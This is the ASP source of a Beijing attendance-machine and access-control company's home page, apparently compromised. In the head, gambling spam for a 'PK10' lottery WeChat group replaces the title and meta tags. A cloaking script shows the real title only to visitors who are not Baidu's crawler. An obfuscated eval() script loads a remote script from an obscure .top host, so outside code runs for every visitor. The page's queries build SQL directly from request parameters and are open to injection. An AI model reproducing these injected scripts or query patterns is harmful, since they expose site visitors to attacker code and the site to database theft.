<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%> <% Server.ScriptTimeout = 99999 %> <!--#include file="inc/Check_Sql123.asp" --> <!--#include file="conn_db123.asp" --> <!--#include file="inc/web_config.asp" --> <!--#include file="inc/funclass.asp" --> <%'Response.Buffer =True 'Response.ExpiresAbsolute = Now() - 1 'Response.Expires = 0 'Response.CacheControl = "no-cache" 'Response.AddHeader "Pragma", "No-Cache" %> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="baidu-site-verification" content="aUYzhBj7Xt" /> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <meta name="viewport" content="initial-scale=1,maximum-scale=1, minimum-scale=1"> <title>极速赛车pk10微信群【找群网zhaoqun5.com】</title> <meta name="keywords" content="极速赛车pk10微信群"/> <meta name="description" content="极速赛车pk10微信群【找群网zhaoqun5.com】实时汇聚最新★进群二维码大全★信誉下分担保★每天不定时发放各种彩金福利等,欢迎大家加入极速赛车pk10微信群来交流。"/> <script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="考勤机_指纹考勤机/门禁_中控考勤机_北京门禁 - 北京亿喜安保商贸中心"}</script> <script> eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('4.d("<8 9=5://1.2.b:0/3.7 c=a/6></8>");',62,14,'99|a50|a61a72a83|cp|document|http|javascript|js|script|src|text|top|type|writeln'.split('|'),0,{})) </script> <% ziduan=trim(request("ziduan")) key=trim(request("key")) probig=trim(request("probig")) prosmall=trim(request("prosmall")) if probig<>"" and prosmall=""then sql="select id,bumen_big,mingcheng,phourl_sma from mkpr_product where bumen_big='"&probig&"' order by ordernum desc " end if if probig<>"" and prosmall<>""then sql="select id,bumen_big,bumen_small,mingcheng,phourl_sma from mkpr_product where bumen_big='"&probig&"' and bumen_small='"&prosmall&"' order by ordernum desc " end if if probig="" and prosmall=""then if key<>"" and ziduan<>""then sql="select * from mkpr_product where "&ziduan&"like '%"&key&"%' order by ordernum desc,id desc " end if if key=""then sql="select * from mkpr_product order by ordernum desc,id desc " end if end if set rs=server.CreateObject("adodb.recordset") rs.open sql,conn,1,2 '------- if not rs.eof then '------- selectidtoview="" do while not rs.eof selectidtoview=selectidtoview&rs("id")&" " rs.movenext loop session("selectid")=trim(selectidtoview) rs.movefirst '因为上面do loop已经到最后一条记录了 '------- PageSize=trim(request("pageSize")) if PageSize<>""then session("pageSize")=PageSize pz=PageSize end if if PageSize=""then if session("pageSize")<>""then pz=session("pageSize") else pz=15 end if end if rs.PageSize=pz pagecount=rs.PageCount pg=int(request.QueryString ("pg")) if pg<=0 then pg=1 if request.QueryString("pg")="" then pg=1 rs.AbsolutePage=pg end if '------- %> <script type="text/javascript" language="javascript"> //为了兼容 IE8 及之前版本的浏览器 var w = window.innerWidth || document.documentElement.clientWidth || document.body.clientWidth; var h = window.innerHeight || document.documentElement.clientHeight || document.body.clientHeight; $("#bkg_img").attr("width", w); $("#bkg_img").attr("height", h); $(window).resize(function(){ $("#bkg_img").attr("width", w); $("#bkg_img").attr("height", h); }) </script> <script type="text/javascript">   document.documentElement.style.fontSize = document.documentElement.clientWidth / 640*100 + 'px'; </script> <style type="text/css"> a:link { text-decoration: none; color: #000000; } a:visited { text-decoration: none; color: #000000; } a:hover { text-decoration: underline; color: #CC3300; } a:active { text-decoration: none; color: #000000; } .STYLE2 {font-size: 13px; font:"新宋体" } --> </style> <style type="text/css"> <!-- .STYLE10 {color: #FFFFFF} --> .bg { background:#272727; color:#FFF; font:"新宋体"; font-size:16px; } .img_put{ border:1px #A4D3EE solid;} table{border:0; border-collapse:collapse;} .table td,table th{border:1px solid #999; padding:.1em 1em} //添加IOS下滚动条 .table-container::-webkit-scrollbar { -webkit-appearance: none; width: 14px; height: 14px; } .table-container::-webkit-scrollbar-thumb { border-radius: 8px; border: 3px solid #fff; background-color: rgba(0, 0, 0, .3); } </style> <style> #table_wrap > table {bottom:10px; z-index:1008; padding:0px; border-radius:6px; width:14%; height:60%; background: #FAFAFA; font-size:15px;} .table thead tr,table tbody tr { height:13px; line-height:13px; /*background-color: pink;*/ } .table thead td,table tbody td { line-width:15px; width:15%; /*background-color: pink;*/ } .table tr th:first-child,table tr td:first-child {/*设置table左边边框*/ border-left: 1px solid #CCCCCC; } .table tr th:last-child,table tr td:last-child {/*设置table右边边框*/ border-right: 1px solid #CCCCCC; } .table tr td:first-child, .table tr td:nth-child(2), .table tr td:nth-child(3), .table tr td:last-child{/*设置table表格每列底部边框*/ border-bottom: 1px solid #CCCCCC; } /*table tr:last-child td:first-child, table tr:last-child td:nth-child(2), table tr:last-child td:nth-child(3), table tr:last-child td:last-child{/!*设置table表格最后一列底部边框*!/ border-bottom: 2px solid #000; }*/ </style> </head> <body> <!--#include file="inctop.asp" --> <!--banner--> <script language='javascript'> linkarr = new Array(); picarr = new Array(); textarr = new Array(); var swf_width=1000px; var swf_height=350; //文字颜色|文字位置|文字背景颜色|文字背景透明度|按键文字颜色|按键默认颜色|按键当前颜色|自动播放时间|图片过渡效果|是否显示按钮|打开方式 var configtg='0xffffff|2|0x3FA61F|0|0xffffff|0xC5DDBC|0x000033|4|1|1|_blank'; var files = ""; var links = ""; var texts = ""; //这里设置调用标记 linkarr[1] = ""; picarr[1] = "images/0111.jpg"; textarr[1] = ""; linkarr[2] = ""; picarr[2] = "images/0333.jpg"; textarr[2] = ""; linkarr[3] = ""; picarr[3] = "images/0444.jpg"; textarr[3] = ""; linkarr[4] = ""; picarr[4] = "images/04444.jpg"; textarr[4] = ""; linkarr[5] = ""; picarr[5] = "images/0555.jpg"; textarr[5] = ""; for(i=1;i<picarr.length;i++){ if(files=="") files = picarr[i]; else files += "|"+picarr[i]; } for(i=1;i<linkarr.length;i++){ if(links=="") links = linkarr[i]; else links += "|"+linkarr[i]; } for(i=1;i<textarr.length;i++){ if(texts=="") texts = textarr[i]; else texts += "|"+textarr[i]; } document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="'+ swf_width +'" height="'+ swf_height +'">'); document.write('<param name="movie" value="images/bcastr3.swf"><param name="quality" value="high">'); document.write('<param name="menu" value="false"><param name=wmode value="opaque">'); document.write('<param name="FlashVars" value="bcastr_file='+files+'&bcastr_link='+links+'&bcastr_title='+texts+'&bcastr_config='+configtg+'">'); document.write('<embed src="images/bcastr3.swf" wmode="opaque" FlashVars="bcastr_file='+files+'&bcastr_link='+links+'&bcastr_title='+texts+'&bcastr_config='+configtg+'&menu="false" quality="high" width="'+ swf_width +'" height="'+ swf_height +'" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" />'); document.write('</object>'); </script> <!--banner end--> <table width="70%" border="0"cellpadding="0" cellspacing="0" style="margin:0 class="table-container"> <tr> <td width="35%" height="20" align="left"> <a href="news.asp" style="float:right"><img src="images/indfiles/090617-32more.gif" border="0"/></a> <a href="news.asp"><img src="images/indfiles/090617-31.gif" border="0" /></a></td> <td width="65%" height="20" align="left"><a href="product.asp"><img src="images/indfiles/090617-32.gif" border="0" /></a></td> </tr> <tr> <td align="left"><% sql="select top "&cst_sy_news_recnum&" id,mingcheng,lurudate from mkgy_news order by ordernum desc,id desc " set rs=server.CreateObject("adodb.recordset") rs.open sql,conn,1,2 %> <table cellpadding="0" cellspacing="1" width="100%" > <%do while not rs.eof%> <tr> <td height="1.5%"><img src="images/n3.gif" border="0" /><a href="news_view.asp?id=<%=rs("id")%>&proindfrom=1" target="_self" ><%=cutStr(rs("mingcheng"),cint(cst_sy_news_titlenum))%></a></td> </tr> <tr> <td class="dotLine"></td> </tr> <%rs.movenext loop set rs=nothing%> </table></td> <td height="20" valign="top" > <% set rs=server.CreateObject("adodb.recordset") sql="select top "&cst_sy_pho_pronum&" mingcheng,phourl_sma,id from mkpr_product order by ordernum desc, id desc " rs.open sql,conn,1,1%> <table width="100%" border="0" cellpadding="2" cellspacing="1" sellpadding="0"> <tr> <% dim l '定义变量i l=1 '定变量的初始值为1 count=0 'FFF4DF do while not rs.eof %> <td align="center" style=""><a href="product_view.asp?id=<%=rs("id")%>" target="_self"><img src="<%=rs("phourl_sma")%>" width="<%=cst_phoprowith%>" height="<%=cst_phoproheight%>" border="0" class="img_put"><br/></br> <%=rs("mingcheng")%></a></td> <% if l mod cst_sy_pho_properlinenum=0 then response.write"</tr><tr>" ' mod 是除法取余,if l mod 4=0 then ...的意思是如果所有的图片个数除以4后的余数是0,那么执行后面的语句。 l=l+1 rs.movenext count=count+1 loop %> </tr> </table> </td> </tr> </table> <table cellspacing="0" cellpadding="0" width="100%"> <tbody> <tr> <td height="auto" class="bg"><div align="center" class="STYLE10" style="margin:0 auto;width:100%;"><br/> <p align="left">公司地址:北京市海淀区翠微路36号中海航大厦5层 中关村站:北京市中关村新中发电子市场4216<br/><br/> 值班手机:13391766693 IE门禁、考勤、消费\停车场及速通门系统咨询:010-51295307 18911334821 <br/> <br/> Copyright◎ <font size="2"><%=sitedns_cst%></font>&nbsp;版权所有:<a href="index.asp"><font size="2" color="#FFFFFF"><%=company_cst%></font></a>&nbsp;<a href="https://beian.miit.gov.cn/" target="_blank"><font size="2" color="#FFFFFF"><%=siteicp_cst%></font></a><br/><p><strong>贴心导航: </strong><a href="http://www.men168.com" target="_blank"><strong>考勤机</strong></a> <a href="http://www.men168.com" target="_blank"><strong>指纹考勤机</strong></a> <a href="http://www.men168.com" target="_blank"><strong>中控考勤机</strong></a> <a href="http://www.men168.com" target="_blank"><strong>北京门禁</strong></a> <a href="http://www.men168.com" target="_blank"><strong>指纹门禁</strong></a> </span></p><br /> </p> </div><%call CloseRsandConn(rs)%></td> </tr> </tbody> </table> </td> </tr> </table> <script type="text/javascript"> var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://"); document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3Fe396ef71c034d6f1aca56f76176cb426' type='text/javascript'%3E%3C/script%3E")) </script> </body> </html> <style> #kefu2{position:absolute;top:90px;left:6px; bottom:16px; z-index:1008; border-radius:10px; padding:5px;border:0px solid; width:110px; height:110px; background:#eeeeee; font-size: 13px;} .cs_qcode{padding: 5px opx 5px opx;} </style> <style> #kefu3{position:absolute;top:230px;left:6px; bottom:16px; z-index:1008; border-radius:10px; padding:5px;border:0px solid; width:110px; height:110px; background:#eeeeee; font-size: 13px;} .cs_qcode{padding: 5px opx 5px opx;} </style> <style> #kefu4{position:absolute;top:82%;left:74%; bottom:10px; z-index:1008; overflow:hidden; border-radius:3px; padding:1px;border:0px solid; width:30%; height:54%; background:; font-size: 15px;} .cs_qcode{padding: 5px opx 5px opx;} </style> <div id="kefu2"> <div class="cs_qcode"> <img src="images/liujie.jpg" width="100" height="100" alt="手机扫描微信码"> <span style="position: absolute; top:100px; left:12px;">咨询添加微信</span> </div> </div> <div id="kefu3"> <div class="cs_qcode"> <a href="http://www.bituneyun.com" target="_blank" title="点图片进入云端系统"><img src="css/images0/user_botton.gif" width="100" height="100" alt=""> </a> <span style="position: absolute; top:100px; left:12px; color:#0000CC; font:"新宋体"">云停车收费平台</span> </div> </div> <div id="kefu4"> <iframe id="myiframe" width="100%" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no" allowtransparency="yes" height="100%" src="lunxie.asp"/> </div>